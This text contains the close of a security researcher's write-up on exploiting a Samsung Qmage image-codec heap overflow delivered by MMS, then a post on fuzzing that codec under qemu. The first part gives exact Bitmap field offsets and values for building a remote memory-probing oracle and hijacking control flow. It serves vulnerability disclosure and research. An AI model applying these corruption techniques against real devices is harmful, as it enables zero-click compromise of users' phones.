The most basic idea for how to achieve that is by overwriting a pointer with an absolute address whose readability (or writability) we intend to test. In theory, if the address is unmapped, the access will crash, and if it is mapped, the read or write will succeed and the app will stay alive. In practice, things are not so simple, because the process may also crash while operating on the data read from the tested address. So for example, the vtable pointer is not a great candidate for an ASLR oracle, because keeping the process alive would not only require it to point to a readable region, but it would also need to contain the address of a function semi-compatible with the original destructor. Such an oracle would realistically hardly ever return true, which makes it of little use to us.
Luckily, the Bitmap object also contains a few other pointers we can try to target. To start off, we can overwrite its whole area with all 0x41's and see how the process crashes, to determine which pointers are accessed, where, and how. The experiment should yield the following result:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 11604 (pool-5-thread-1), pid 10524 (droid.messaging)*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***[...]
backtrace:      #00 pc 000000000047a760  /system/lib64/ (SkColorSpace::toXYZD50(skcms_Matrix3x3*) const+8)      #01 pc 000000000018df90  /system/lib64/ (GraphicsJNI::getColorSpace(_JNIEnv*, SkColorSpace*, SkColorType)+280)      #02 pc 00000000002b5788  /system/framework/arm64/boot-framework.oat (art_jni_trampoline+152)      #03 pc 00000000005818bc  /system/framework/arm64/boot-framework.oat (      #04 pc 000000000057faf0  /system/framework/arm64/boot-framework.oat (      #05 pc 00000000005804f4  /system/framework/arm64/boot-framework.oat (
The stack trace indicates that the crash occurs while accessing the color space, which is represented by the mInfo.fColorSpace pointer. It might be promising for an oracle, but let's see what happens if it's set to an address of readable memory containing only zeros:
Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 12666 (pool-5-thread-1), pid 12550 (droid.messaging)*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***[...]pid: 12550, tid: 12666, name: pool-5-thread-1  >>> <<<uid: 10128signal 6 (SIGABRT), code -1 (SI_QUEUE), fault addr --------Abort message: 'No pending exception expected: java.lang.IllegalArgumentException: Parameter a or g is zero, the transfer function is constant  at void$Rgb$TransferParameters.<init>(double, double, double, double, double, double, double) (  at (  at (
Unfortunately, the app crashes again, this time due to a failed color space sanity check performed by the TransferParameters method. This means that that pointer is not the perfect gadget for us either, because zeros in memory are exceedingly common, and it would be preferable to distinguish unmapped memory from mapped zero'ed memory in the ASLR oracle output.
The advantage of the last crash report is that it gives us a very clean Java call stack, indicating exactly where the bitmap-related operations occur. It is shown below in full, up until the Messages app method that loads the bitmap delivered in MMS:$Rgb$TransferParameters.<init>[...]
We can see that Samsung has a helper ImageUtil class for working with bitmaps, and that unfortunately some symbols in the app are obfuscated (i.e. the method name). Since the Messages app is not open source, we have to decompile it in order to examine the relevant code. The APK can be found in the /system/priv-app/SamsungMessages_11/SamsungMessages_11.apk file, and my decompiler of choice is jadx.Lifetime of a BitmapWhen we dig into the Java code, it becomes evident that the lifetime of the Bitmap object is somewhat complex, and it may be subjected to a few transformations. Let's take it step by step:
  1. The initial Bitmap is created through BitmapFactory.decodeStream call   ImageUtil.loadBitmapFromStream:

  2. The bitmap is then subjected to scaling:

  3. The scaling is in fact optional, and only happens if the bitmap dimensions are greater than the intended ones:

  4. Lastly, in the method, if the bitmap configuration is not ARGB_8888, it is converted to such encoding:

In a nutshell, step 1 is where the bitmap is allocated, decoded, and overflown, and steps 2 and 3 are where the corrupted object is used, and where we should look for the desired ASLR oracle primitive.
I spent quite some time looking at the image-related Skia code and experimenting with various values of the Bitmap fields. Eventually, I discovered a perfect technique for probing arbitrary addresses to check if they are readable. The primitive is located in step 3 (bitmap conversion to ARGB_8888), so the first order of business is to disable the scaling in step 2. Assuming that we're starting off with a blob of 160 bytes 0x41 again, we should adjust:
  • fWidth (offset 0x0c) → 0x1
  • fHeight (offset 0x10) → 0x1

While we're at it, it will make our life easier later if we make the second set of dimensions sane too:
  • mInfo.fWidth (offset 0x60) → 0x1
  • mInfo.fHeight (offset 0x64) → 0x1

Then, we need to make sure that we pass the rowBytes checks (1, 2) in SkBitmap::setInfo by setting it to a sensible value:
  • fRowBytes (offset 0x20) → 0x1000

If mInfo.fColorSpace is non-NULL, it will be dereferenced, so we have to zero it out:
  • mInfo.fColorSpace (offset 0x58) → 0x0

This gets us past the copying/sanity checking of the basic properties of the bitmap, and into the pixel copying logic under To be able to use the swizzle_or_premul conversion routine, the color type needs to be either RGBA_8888 (4) or BGRA_8888 (6), and since it cannot be the former due to the Bitmap.Config check in Java code, there is only one option left:
  • mInfo.fColorType (offset 0x68) → 0x6

Finally, we arrive at the following loop:
62:    for (int y = 0; y < dstInfo.height(); y++) {63:        SkOpts::RGBA_to_BGRA((uint32_t*)dstPixels, (const uint32_t*)srcPixels, dstInfo.width());64:        dstPixels = SkTAddOffset<void>(dstPixels, dstRB);65:        srcPixels = SkTAddOffset<const void>(srcPixels, srcRB);66:    }
That's where the BGRA to RGBA conversion takes place. In the above snippet, the values of most variables originate from the overwritten android::Bitmap object:
  • dstInfo.height() == mInfo.height
  • dstInfo.width() == mInfo.width
  • srcPixels == fPixels
  • srcRB == fRowBytes

So in other words, for each row of the bitmap, the code copies width×4 bytes from a controlled pointer, and moves the pointer by fRowBytes. This is also illustrated below:

This conversion logic gives us enormous flexibility in terms of the addresses we can trigger accesses to, and importantly, the data being read is just pixel colors, which are completely neutral to the control flow of the code. In the most basic scenario, we can leave the current state of the corrupted fields and make just two more changes:
  • fPixels (offset 0x18) → start of the probed address range
  • mInfo.fHeight (offset 0x64) → number of pages to probe

This will cause Skia to read four bytes in 0x1000 byte intervals, in mInfo.fHeight iterations, starting from the fPixels address. It is equivalent to probing the readability of an arbitrary continuous memory area – if all pages are mapped and readable, the loop will complete successfully and the app will stay alive; otherwise, it will crash while trying to access the first non-readable page in the tested range.
As always, we should confirm the behavior on a real device. We can start off with setting fPixels to an invalid address such as 0xccc...ccc, and sending the sample via MMS:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 1101 (pool-8-thread-1), pid 848 (droid.messaging)*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***[...]
backtrace:      #00 pc 00000000006fb210  /system/lib64/ (neon::RGBA_to_BGRA(unsigned int*, unsigned int const*, int)+96)      #01 pc 00000000003b5410  /system/lib64/ (_ZL17swizzle_or_premulRK11SkImageInfoPvmS1_PKvmRK22SkColorSpaceXformSteps.llvm.9990621564539140211+208)      #02 pc 00000000003b5114  /system/lib64/ (SkConvertPixels(SkImageInfo const&, void*, unsigned long, SkImageInfo const&, void const*, unsigned long)+156)      #03 pc 00000000004f26c0  /system/lib64/ (SkPixmap::readPixels(SkImageInfo const&, void*, unsigned long, int, int) const+312)      #04 pc 0000000000185fb8  /system/lib64/ (bitmapCopyTo(SkBitmap*, SkColorType, SkBitmap const&, SkBitmap::Allocator*)+384)      #05 pc 000000000018397c  /system/lib64/ (Bitmap_copy(_JNIEnv*, _jobject*, long, int, unsigned char)+284)[...]
A sigsegv is indeed generated upon a read from the bad address in the color conversion function. Let's try something more complex. On my test device, the last mapping in the address space of the process is a stack:
7fdf319000-7fdfb18000 rw-p 00000000 00:00 0                              [stack]
To verify that our oracle primitive touches each page in the given area, we can set fPixels to 0x7fdfb10000 (eight pages before the end of the stack), and mInfo.fHeight to 10. As a result, we should see the following crash:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7fdfb18000 in tid 1630 (pool-8-thread-1), pid 1500 (droid.messaging)
The fault address lies directly after the stack mapping, which indicates that the loop successfully executed eight iterations, and failed during the ninth, when it went out of bounds. This completes our quest for a suitable ASLR oracle primitive, as it ultimately shows that we can now remotely trigger memory reads of a highly-controllable set of addresses in the context of the attacked Messages app.SummaryTo recap, we have analyzed the available memory corruption bugs based on pseudo-ASAN crash reports, and decided to work with a linear heap overflow present in RLE decompression. The overflown buffer is a pixel storage allocation associated with an android::Bitmap object, and thanks to some useful jemalloc properties (determinism, size bins, lack of inline metadata), we found a way to reliably corrupt the relevant Bitmap object itself.
The Bitmap class is non-trivial, and it provides a variety of useful primitives when corrupted. In order to hijack the control flow, we can provoke a call from an arbitrary vtable pointer, or cause a direct call to a controlled function pointer with two arguments, if we know the address of Furthermore, in the context of a potential ASLR bypass, we can prompt accesses from a controlled memory range, which may trigger a crash or not depending on the readability of the region. This is as good as we're going to get with regards to low-level exploitation capabilities.
With solid foundations laid down for the attack, we can shift our attention to some important higher level issues, such as:
  • How to programmatically send MMS messages?
  • How to (ab)use the MMS protocol to leak information on whether the Messages app crashed upon the receipt of a message?
  • Even with the presence of a potential side channel, how to disclose the full addresses of data and/or code in an effective and timely manner?
  • Finally, how to convert the currently known RCE primitives to achieve actual arbitrary code execution?

Finding the answers to these questions will be the subject of the upcoming blog posts in the series.
Kategorie: Hacking & Security

MMS Exploit Part 2: Effective Fuzzing of the Qmage Codec

23 Červenec, 2020 - 18:32
Posted by Mateusz Jurczyk, Project Zero
This post is the second of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.
IntroductionIn Part 1, I discussed how I discovered the "Qmage" image format natively supported on all modern Samsung phones, and how I traced its roots to Android boot animations and even some pre-Android phones. At this stage of the story, we also know that the codec seems very fragile and is likely affected by bugs, and that it constitutes a zero-click remote attack surface via MMS and the default Samsung Messages app. I was at this point of the project in early December 2019. The next logical step was to thoroughly fuzz it – the code was definitely too extensive and complex to approach with a manual audit, especially without access to the original source or expertise of the inner workings of the format. As a big fan of fuzzing, I hoped to be able to run it in accordance with the current state of the art: efficiently (without unnecessary overhead), at scale, with code coverage information, reliable reproducibility and effective deduplication. But how to achieve all this with a codec that is part of Android, accessible only through Skia image API, and precompiled for the ARM/ARM64 architectures only? Read on to find out!Writing the test harnessThe fuzzing harness is usually one of the most critical pieces of a successful fuzzing session, and it was the first thing I started working on. I published the end result of my work as  SkCodecFuzzer on GitHub, and it can be used as a reference while reading this post. My initial goal with the loader was to write a Linux command-line program that could run on physical Android devices, and use the Skia SkCodec interface to load and decode an input image file in exactly the same way (or at least as closely as possible) as the internal Android doDecode function does it. This turned out to be surprisingly easy: if we ignore some largely irrelevant portions of doDecode, such as interactions with the JNI (Java Native Interface), NinePatch related code and scaling, we are left with just a handful of simple method calls. Accordingly, the ProcessImage() function in my harness is less than 100 lines of code. In order to build such an initial version of the loader, I used the Android NDK toolset, included several header files from the Skia source code, and linked it with the library from the target operating system. After copying the executable and an example Qmage file (let's stick with accessibility_light_easy_off.qmg from Part 1) to my test phone, I could test that it worked:
d2s:/data/local/tmp $ ./loader accessibility_light_easy_off.qmg[+] Detected image characteristics:[+] Dimensions:      344 x 344[+] Color type:      4[+] Alpha type:      3[+] Bytes per pixel: 4[+] codec->GetAndroidPixels() completed successfullyd2s:/data/local/tmp $
It's worth noting that the harness I used for my fuzzing had one extra check, verifying that the input file started with a QM or QG signature. This was necessary to make sure that the coverage-guided fuzzing wouldn't diverge towards other image formats supported by Skia, and only Qmage-related code would remain tested. There is also a slight difference between Android's code and my harness in the specific heap allocation class used (SkBitmap::HeapAllocator vs a selection of possible classes), but that shouldn't matter in any practical way.
Having such a loader run on Android is great, but it doesn't scale very well and my fuzzing tooling is much better on x86 too, so I was very tempted to get it running on the Intel architecture. One solution would be to try and run the same aarch64 ELF in an emulator such as qemu-aarch64. To make this work, we have to make sure that all potential dependencies of the harness are accessible on the host's file system, by pulling the full /system/lib64 directory, the /system/bin/linker64 file, and perhaps further directories such as /apex/ from the research phone to our PC. Once we have that, we can try executing the loader under qemu:
j00ru@j00ru:~/SkCodecFuzzer/source$ LD_LIBRARY_PATH=$ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/sysroot/usr/lib/aarch64-linux-android:$ANDROID_PATH/lib64 qemu-aarch64 ./loader accessibility_light_easy_off.qmg[+] Detected image characteristics:[+] Dimensions:      344 x 344[+] Color type:      4[+] Alpha type:      3[+] Bytes per pixel: 4[+] codec->GetAndroidPixels() completed successfullyj00ru@j00ru:~/SkCodecFuzzer/source$
If $ANDROID_PATH above points to a directory with Android 9 system files, it works! This is great news as it means that there aren't any fundamental blockers to running emulated Android user-mode components on a x86-64 host. With Android 10 system files, there was one minor issue with an abort thrown by
==31162==Sanitizer CHECK failed: /usr/local/google/buildbot/src/android/llvm-toolchain/toolchain/compiler-rt/lib/sanitizer_common/ ((internal_prctl(0x53564d41, 0, addr, size, (uptr)name) == 0)) != (0) (0, 0)libc: Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 31162 (qemu-aarch64), pid 31162 (qemu-aarch64)
By looking at the underlying code, it would seem that an UBSAN_OPTIONS=decorate_proc_maps=0 environment variable should fix the problem, but it didn't, and I didn't investigate further. Instead, I swapped the library with its older copy from Android 9, and the harness correctly worked again.
So, we can now run the Qmage codec on a typical Intel workstation, but one question remains – what is the performance? Software emulation such as qemu's is known to introduce visible overhead as compared to native execution speed. Let's quickly compare the run time of the loader on a Samsung device and in qemu, against the accessibility_light_easy_off.qmg sample:
d2s:/data/local/tmp $ time ./loader accessibility_light_easy_off.qmg >/dev/null    0m00.12s real     0m00.09s user     0m00.03s systemd2s:/data/local/tmp $
j00ru@j00ru:~/SkCodecFuzzer/source$ LD_LIBRARY_PATH=$ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/sysroot/usr/lib/aarch64-linux-android:$ANDROID_PATH/lib64 time qemu-aarch64 ./loader -d -i accessibility_light_easy_off.qmg >/dev/nullreal  0m0.380suser  0m0.355ssys   0m0.025sj00ru@j00ru:~/SkCodecFuzzer/source$
Based on this simple test, there seems to be a ~3x slowdown when running in the emulator. This is not great but completely acceptable, especially if we can scale it up to numerous machines, and maybe find some further optimizations along the way.
At this point, we have a very basic harness that just decodes an input image using the same Skia interfaces as Android. Let's see how we can make it better fit for fuzzing.Improvement #1 – custom ASAN-like crash reportsOne problem with the loader running under qemu is how crashes are manifested by default:
libc: Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x4089bfc000 in tid 929264 (qemu-aarch64), pid 929264 (qemu-aarch64)
A native SIGSEGV signal is generated in the emulator and caught by the default libc handler. Let's try this again with gdb attached to see where the exception is thrown:
─────────────────────────────────────────────────────────────── code:x86:64   0x555555fce3ed <code_gen_buffer+7496640> lea    r14, [rbx+0x1]   0x555555fce3f1 <code_gen_buffer+7496644> shl    r14, 0x8   0x555555fce3f5 <code_gen_buffer+7496648> sar    r14, 0x8 → 0x555555fce3f9 <code_gen_buffer+7496652> movzx  r14d, BYTE PTR [r14]   0x555555fce3fd <code_gen_buffer+7496656> add    rbx, 0x2   0x555555fce401 <code_gen_buffer+7496660> mov    QWORD PTR [rbp+0xa8], rbx   0x555555fce408 <code_gen_buffer+7496667> and    r12d, 0xffffff   0x555555fce40f <code_gen_buffer+7496674> mov    rbx, r12   0x555555fce412 <code_gen_buffer+7496677> shl    rbx, 0x8───────────────────────────────────────────────────────────────────── trace[#0] 0x555555fce3f9 → code_gen_buffer()[#1] 0x55555563c720 → cpu_exec()[#2] 0x55555566e528 → cpu_loop()[#3] 0x5555555f94cd → main()
As we can see, the x86-64 instruction triggering the crash resides in qemu's code generation buffer, and it's hard to trace it to the actual culprit in ARM assembly inside The native call stack isn't of much help either, as it only shows the qemu internal functions and not the stack frames of the emulated code. Because of all this, working with these raw crashes is incredibly difficult – they are hard to analyze, triage or deduplicate without re-running them on an Android device. There had to be another way to extract accurate information about the emulated ARM CPU context at the time of the crash.
The internal Google fuzzing infrastructure I use for projects like this supports both native crashes (signals) and AddressSanitizer reports. Most importantly, these reports don't have to be 100% identical to legitimate ASAN outputs. They only have to be close enough to be correctly parsed, but they can still contain both fake data (if the specific information is not available in the given context), and some extra sections you don't normally see in ASAN-enabled targets. I have already taken advantage of this behavior a few times in the past, for example in the DrSancov project I published, which aims to convert any closed-source Linux x86(-64) executable into a semi-ASAN/SanitizerCoverage compatible one using the DynamoRIO instrumentation framework. This was my idea here too – if I could register my own signal handler in the harness, it could print out all the relevant context that it has access to within the emulated process, effectively faking an ASAN crash.
The end result is the GeneralSignalHandler function and other unwinding and symbol-related helper routines, which are able to generate pretty crash reports such as the following one:
ASAN:SIGSEGV===================================================================936966==ERROR: AddressSanitizer: SEGV on unknown address 0x408a0e1000 (pc 0x4006605174 sp 0x4000d0adc0 bp 0x4000d0adc0 T0)    #0 0x002bd174 in (PVcodecDecoder_GrayScale_16bits_NEW+0x2290)    #1 0x0029cf00 in (__QM_WCodec_decode+0x3b8)    #2 0x0029c9b4 in (Qmage_WDecodeFrame_Low_Rev14474_20150224+0x144)    #3 0x0029ae7c in (QuramQmageDecodeFrame_Rev14474_20150224+0xa8)    #4 0x006e1ef0 in (SkQmgCodec::onGetPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const&, int*)+0x450)    #5 0x004daf00 in (SkCodec::getPixels(SkImageInfo const&, void*, unsigned long, SkCodec::Options const*)+0x358)    #6 0x006e278c in (SkQmgAdapterCodec::onGetAndroidPixels(SkImageInfo const&, void*, unsigned long, SkAndroidCodec::AndroidOptions const&)+0xac)    #7 0x004da498 in (SkAndroidCodec::getAndroidPixels(SkImageInfo const&, void*, unsigned long, SkAndroidCodec::AndroidOptions const*)+0x2b0)    #8 0x0004a9a0 in loader (ProcessImage()+0x55c)    #9 0x0004ac60 in loader (main+0x6c)    #10 0x0007e858 in (__libc_init+0x70)
==936966==DISASSEMBLY    0x4006605174: ldrb        w9, [x13, #1]    0x4006605178: add         x13, x13, #2    0x400660517c: bfi         w9, w2, #8, #0x18    0x4006605180: stur        w9, [x29, #-0xf8]    0x4006605184: ldur        w19, [x29, #-0xf4]    0x4006605188: cbz         x8, #0x40066051fc    0x400660518c: b           #0x4006605250    0x4006605190: ldr         x9, [sp, #0x110]    0x4006605194: orr         w27, wzr, #7    0x4006605198: ldrb        w4, [x9, #1]!
==936966==CONTEXT   x0=fffffffffffffaa8  x1=0000000000000558  x2=0000000000000000  x3=0000000000000014   x4=0000004089d33670  x5=0000000000000003  x6=0000000000000003  x7=0000000000000011   x8=0000000000000004  x9=0000000000000000 x10=0000000000000004 x11=000000408a0e2f8f  x12=0000000000000000 x13=000000408a0e0fff x14=000000408a0deffc x15=000000000000001f  x16=0000000000000018 x17=0000000000000000 x18=00000040013f4000 x19=000000000000005b  x20=0000000000007000 x21=000000408a0c6f55 x22=000000408a0c4eaa x23=0000000000000000  x24=0000000095100000 x25=000000408a0e0764 x26=0000000000000005 x27=0000000000000007  x28=0000000000000128  FP=0000004000d0b020  LR=0000004089d338c0  SP=0000004000d0adc0
The first section of the report is essential for automation, as it includes the type of the signal and stack trace used for deduplication. The disassembly and register values are supplementary and mostly useful in triage, to quickly determine what kind of crash we are dealing with.
The extra functionality comes at the cost of slightly more difficult compilation, as Capstone and libbacktrace need to have their headers included, and static/shared objects linked into the loader. Fortunately this didn't turn out to be too hard, as outlined in SkCodecFuzzer's README. If you run into any issues during the building process with SkCodecFuzzer, please refer to the Issues section as several related problems have been resolved there.
In its current shape, the signal handler also includes a few interesting workarounds to problems I didn't originally anticipate and only stumbled upon them during development and testing:
  • On Android 10, executable code sections (.text etc.) are marked as Execute Only and are thus non-readable (--x access rights). This caused the signal handler to fail when running on a physical Android device, as Capstone would trigger a nested crash while trying to read the instruction bytes for disassembly. I fixed this with an mprotect call to make the memory readable.
  • If the stack is corrupted (e.g. due to a buffer overflow), the stack unwinding code may crash on invalid memory access. Such "double faults" need to be gracefully handled so that the full crash report is always generated correctly. I fixed this with the DoubleFaultHandler and the globals::in_stack_unwinding flag.
  • The abort libc function (called e.g. by __stack_chk_fail) disables the delivery of all signals other than SIGABRT, making it impossible to catch nested exceptions in the stack unwinder. I fixed this with a sigprocmask call.
  • Crashes occurring at different offsets within standard memory manipulation functions (memcpy, memmove, memset) were wrongly classified as unique, bloating the results and skewing the numbers. I fixed this by detecting these special functions and using their entrypoint addresses in the stack trace, instead of the precise addresses of the faulting instructions.
Improvement #2 – custom low-level allocator (libdislocator)The custom signal handler is a very useful feature for inspecting and deduplicating crashes, but it helps the most coupled with effective detection of memory safety violations. On Android 9 and 10, Skia uses the default system allocator (jemalloc), which is optimized for performance and not fuzzing. As a result, many tiny out-of-bounds memory accesses may not be detectable at all, as they will just silently fall into the adjacent allocation without corrupting any critical data. In other cases, some bugs may overwrite different adjacent chunks in different test runs due to a non-deterministic heap state, leading to exceptions being thrown further down the line at different locations of the library. All in all, using the default allocator in fuzzing is almost guaranteed to conceal some bugs, and obscure the real root cause of others.
The solution to this problem are allocators specialized for fuzzing, which typically incur a significant memory overhead, but can provide very precise detection of memory bugs at the very moment when they happen. On Windows, examples of such allocators are PageHeap in user-mode and Special Pool in the kernel. On Linux, for closed-source software, there is Electric Fence and of course projects like valgrind for improved bug detection, but my favorite tool for the job is AFL's libdislocator. It is a super lightweight (<300 lines) module that simply implements malloc and free as mmap and mprotect, placing each returned chunk precisely at the end of a mapped memory page. It is easily adjustable, works on x86/ARM, and can be used as both a preloaded .so library, or linked statically into the harness.
In my case, I linked it in statically and redirected allocator calls to it via the malloc_hook mechanism. On Android, enabling these hooks requires setting the LIBC_HOOKS_ENABLE environment variable, which lets us easily switch between libdislocator and jemalloc when needed. Thanks to being able to intercept the heap allocator interface, I could also implement the --log_malloc flag, to log all allocs and frees taking place in the process at runtime. This option proved invaluable to me later during exploit development, as it allowed me to better understand the allocation patterns and identify the crashes most suitable for exploitation.
The entire fuzzing session ran with libdislocator enabled, and I believe that all identified crashes manifested real bugs in the code. At the same time, it is important to note that there are some differences between the custom and default system allocator, which may influence how easy it is to reproduce a libdislocator crash with jemalloc (also detailed in my original bug report in section "3.3. Libdislocator vs libc malloc"):
  • There is a hard 1 GB allocation limit enforced by libdislocator, which makes it easier to surface bugs related to memory pressure, but may also mask issues that require large allocations to succeed first.
  • libdislocator doesn't adhere to the same allocation alignment rules as jemalloc, meaning that it may return completely misaligned pointers (side note: it is therefore incompatible with software that uses the low pointer bits for tags). This may hide some small out-of-bounds memory accesses (1-7 bytes) on Android, if they happen to fall into the padding area. It's worth noting that the misalignment occurs only in qemu, which doesn't seem to enforce the address alignment requirement on atomic instructions such as LXDR. On Android itself, the harness does correctly align the chunks too, in order to prevent bogus SIGBUS signals being thrown.
  • libdislocator fills all new allocations with a 0xCC marker byte to improve detection of use of uninitialized memory. With jemalloc, the contents of each allocated chunk are not guaranteed to have any particular value. Controlling the bytes of a specific fresh allocation may be non-trivial or require the use of "heap massaging" techniques in practical attack scenarios.

With the custom allocator covered, we have arrived at the current form of the SkCodecFuzzer harness. It is time to look beyond it and see how we can achieve even more at the level of the qemu emulator.Implementing a Qemu fork serverEarlier in the post, I showed how decoding a sample Qmage file with our loader under qemu takes around 380ms. A question arises, what part of it is the qemu start up time, and is there any room for optimization here? We can run a simple test and measure the run time of the loader without any arguments:
Error: missing required --input (-i) option
Usage: [LIBC_HOOKS_ENABLE=1] ./loader [OPTION]...
Required arguments:[...]
real  0m0.360suser  0m0.336ssys   0m0.024sj00ru@j00ru:~/SkCodecFuzzer/source$
It turns out that simply printing out some help and immediately exiting takes 95% of the time it takes to decode a bitmap, indicating that there is a large constant cost of starting the process, which we can try to eliminate or at least significantly reduce. There is a well known solution to this problem called fork server, and the internal Google fuzzing infrastructure supports it, including the ability to resume execution from a user-defined forkserver_main function.
Of course in this case, enabling the fork server is not as easy as flipping a configuration flag, because that would only accelerate the qemu process startup time (already quite short at 10ms). However, the bulk of the overhead (~350ms in our testing so far) comes from bootstrapping the emulated environment before the target main function is reached:

Therefore, we have to get the fork server to fork inside qemu at the point when the emulation reaches the "loader" program entrypoint (at the border of the yellow      and green      sections). Fortunately, we don't have to figure it all out on our own, as AFL already supports such a mechanism. To make it work with qemu-4.1.1 (the version I was using), I had to modify the code in two places:
  1. In the load_elf_image function in linux-user/elfload.c, to find the entry point of the loader executable, similarly to how afl_entry_point is initialized in AFL's patch.
  2. In the cpu_tb_exec function in accel/tcg/cpu-exec.c, to detect when the emulation has reached the entry point and to call into the special forkserver_main routine to activate the fork server, similarly to how the AFL_QEMU_CPU_SNIPPET2 macro executes in AFL's patch.

These two relatively simple modifications were sufficient to cause a dramatic boost of fuzzing performance. Let's look at the numbers from the servers I actually ran the fuzzing on. They're a bit slower than my workstation, so without the fork server, the loader takes on average 1160ms to decode a sample from my corpus. With the fork server, this is reduced to 56ms, which makes it a ~20.5x speed up! And it gets even better when we enable the code coverage collection (discussed in next section) and specify the -d nochain command line flag: in that setting, the average decoding times grow to 6900ms (without fork server) and 147ms (with fork server) respectively, which further widens the gap between them to a factor of ~47x. In fuzzing, the importance of such small yet crucial optimization tricks simply cannot be overstated.Extracting code coverage – introducing QemuSanitizerCoverageAnother hugely important part of automated software testing is collecting and acting on the code coverage triggered by mutated samples. The fuzzer that I used supports reading .sancov coverage information files generated by the SanitizerCoverage instrumentation. Since the harness already pretends to be an ASAN-enabled target, why not become a SanCov-compatible one too? This is exactly the purpose of the DrSancov project, but it is based on DynamoRIO and thus can only be used with software compatible with the host CPU architecture. So, I had to "port" DrSancov to qemu, creating a mod dubbed QemuSanitizerCoverage.
I began working on the port by looking for a location in the code where the information about each executed basic block passed through. I quickly found the -d exec option (and this helpful blog post), which could be used to print out the kind of data I was interested in, but in textual form. I traced it back to the following snippet:
149:    qemu_log_mask_and_addr(CPU_LOG_EXEC, itb->pc,150:                           "Trace %d: %p ["151:                           TARGET_FMT_lx "/" TARGET_FMT_lx "/%#x] %s\n",152:                           cpu->cpu_index, itb->tc.ptr,153:                           itb->cs_base, itb->pc, itb->flags,154:                           lookup_symbol(itb->pc));
The above code resides in the familiar cpu_tb_exec function in accel/tcg/cpu-exec.c, which I had already modified to enable the fork server. In here, I only had to add a simple call to my sancov_log_trace() callback, passing itb->pc as the only argument. The actual work happens in the callback itself: if the instruction address resides in a known library, the corresponding cell in its coverage bitmap is marked as visited; if not, the /proc/pid/maps file is parsed to find the shared object or executable. Then, right before qemu exits, the collected coverage is dumped to disk. This is how it looks in practice:
$ ASAN_OPTIONS=coverage=1 LD_LIBRARY_PATH=`pwd`/lib64 ./qemu-aarch64 -d nochain ./loader accessibility_light_easy_off.qmg [+] Detected image characteristics:[+] Dimensions:      344 x 344[+] Color type:      4[+] Alpha type:      3[+] Bytes per pixel: 4[+] codec->GetAndroidPixels() completed successfullyQemuSanitizerCoverage: ./ 1502 PCs writtenQemuSanitizerCoverage: ./ 333 PCs written$
We get an output message similar to the one typically printed by SanitizerCoverage, which informs us that the processing of the sample Qmage file involved 1502 unique basic blocks in We can take a peek at the coverage data:
$ xxd -e -g 4 | head -n 500000000: ffffff32 c0bfffff 00000d38 000010a4  2.......8.......00000010: 000010ac 000010b0 000010b4 000010b8  ................00000020: 000010c4 000010d8 000010e0 000011a4  ................00000030: 000011a8 000011c0 000011cc 00001204  ................00000040: 0006fa94 0006fac4 0006fad0 0006fadc  ................$
There is an 8-byte header indicating the 32-bit format, followed by offsets of basic blocks relative to the start of the .text section in We can convert the file to a format supported e.g. by Lighthouse and visualize the coverage or use the information directly to maintain an optimal corpus throughout the fuzzing session:

The benefits of having insight into the code coverage of a fuzzing target are well known, but I will emphasize that this feature played a key role in this project. It helped me fill in any gaps in my original input corpus, and get some degree of confidence that this highly extensive codec was tested thoroughly.Initial file corpusIn my preparation for the first fuzzing attempt of the codec from Samsung Galaxy A50 (Android 9), there were three formats that I needed to find for my corpus: QMv1, QG1.0 and QG1.1. I was able to locate and extract a number of test cases encoded in each of them from the resources of built-in APKs in various Samsung firmwares from the 2014-2016 period, which I deemed sufficient to get myself started. Once I collected the initial data set, I ran a number of test fuzzing sessions during which the corpus continuously evolved thanks to the code coverage feedback. After a few days, it looked nothing like the original set of files: new samples were added, and most initial files were either removed or significantly mutated in the process. I was especially happy to see that a great majority of the files in the resulting corpus were minimized down to 20-50 bytes, which I attribute to the corpus management algorithm which favors shorter samples over longer ones (as described in my BH EU 2016 talk, slides 49-70).
When I learned about the existence of the new QG2.0 format in Android 10, I immediately went looking for such bitmaps in the usual place – embedded APK resources. To my surprise, I didn't find any images encoded in the new format then, and I still haven't seen any such files "in the wild" to date. This meant that I had to improvise. One of my attempts to create samples resembling the QG2.0 format was to take the existing ones in my corpus and hardcode the version in their headers to 2.0. This didn't work out very well as most such files were immediately crashing the codec (instead of hitting some deeper code paths), and I was left with only a few dozen artificial QG2.0 samples that probably didn't have very good coverage. I decided to leave the rest to the fuzzer and hope that over time, it would manage to synthesize much more interesting inputs in the new format.
I was not disappointed. Based on my measurements, after several days of fuzzing, the coverage of the QG2.0-related code paths was comparably good to the coverage of the three older formats. I will go into more detail on the numbers in a later section, but I think it is interesting to note that my December 2019 fuzzing session of the ≤ QG1.1 formats touched 18268 basic blocks in, while my January 2020 session of all ≤ QG2.0 formats had a coverage of 29081 blocks in the same library (and the coverage rate relative to the size of the Qmage codec was similar in both cases, at ~90%). This is a 59% increase, and it goes to show the extent of extra complexity added by Samsung in Android 10. It also seems in line with the size of the Qmage-related code in (mentioned in Part 1), which was 425 kB in Android 9, and 908 kB in Android 10.
As a last thought, I find it amusing how the fuzzer managed to reach the QG2.0 code paths, considering that this latest format introduces a one-byte checksum, which is verified against the length of the file size in QmageDecCommon_ParseHeader:
if (input_data[header_size - 1] != xored_bytes_of_file_length) {  __android_log_print(ANDROID_LOG_ERROR, "QG",                      "QmageDecCommon_ParseHeader : checksum is different!");  return -2;}
